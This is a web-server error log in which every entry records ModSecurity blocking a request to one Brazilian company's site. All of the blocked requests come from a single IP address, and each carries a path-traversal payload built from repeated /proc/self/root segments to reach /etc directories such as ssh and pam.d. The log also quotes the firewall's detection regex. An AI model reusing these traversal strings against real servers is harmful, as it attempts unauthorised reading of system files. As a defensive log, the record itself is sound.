[Thu Mar 19 05:12:26.591193 2026] [:error] [pid 27403:tid 140411699963648] [client 74.7.243.128:41216] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuv6hkFeYa1D6dYQnDBigAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:12:30.063480 2026] [:error] [pid 14269:tid 140411666392832] [client 74.7.243.128:41220] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuv7gbLMZ6AikZjR9UwGgAAAAk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:12:32.522119 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.243.128:40098] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuv8Mdf6f5d65gmYZRGSQAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:12:36.164209 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.243.128:40110] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuv9Pu8EFLIOrSqIptxjAAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:12:37.450375 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:40118] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuv9da6ubjKNq_cu4YV7AAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:12:39.899052 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.243.128:40126] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuv9wkwaGbbGflqUZCJHwAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:12:41.280930 2026] [:error] [pid 27293:tid 140411590858496] [client 74.7.243.128:57390] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuv-f-YZRR_7pZ7nDJgDQAAA9I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:12:42.574253 2026] [:error] [pid 14269:tid 140411574073088] [client 74.7.243.128:57406] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuv-gbLMZ6AikZjR9UwIgAAABQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:12:43.884947 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:57414] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuv-8df6f5d65gmYZRGSgAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:12:46.330802 2026] [:error] [pid 27293:tid 140411699963648] [client 74.7.243.128:57426] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuv_v-YZRR_7pZ7nDJgEgAAA8U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:12:47.660805 2026] [:error] [pid 14269:tid 140411557287680] [client 74.7.243.128:57442] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuv_wbLMZ6AikZjR9UwJQAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:13:01.804575 2026] [:error] [pid 14269:tid 140411641214720] [client 74.7.243.128:57444] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwDQbLMZ6AikZjR9UwQAAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:13:03.209120 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.243.128:38910] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwD-yqAr6etmhZHNo2RQAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:13:13.955783 2026] [:error] [pid 17653:tid 140411641214720] [client 74.7.243.128:38918] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwGcdf6f5d65gmYZRGXwAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:13:15.295146 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.243.128:57192] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwGwkwaGbbGflqUZCJXAAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:13:16.651762 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.243.128:57198] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwHAkwaGbbGflqUZCJYAAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:13:18.012081 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:57214] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwHta6ubjKNq_cu4YWBQAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:13:20.375376 2026] [:error] [pid 19093:tid 140411691570944] [client 74.7.243.128:57216] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwIF_V7PWP6ixUYl6OpwAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:13:22.716450 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.243.128:52310] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwIuoXxyEfFpUF8f_jrwAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:13:25.117693 2026] [:error] [pid 27403:tid 140411666392832] [client 74.7.243.128:52324] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwJRkFeYa1D6dYQnDBrQAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:13:26.471363 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:52334] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuwJta6ubjKNq_cu4YWCwAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
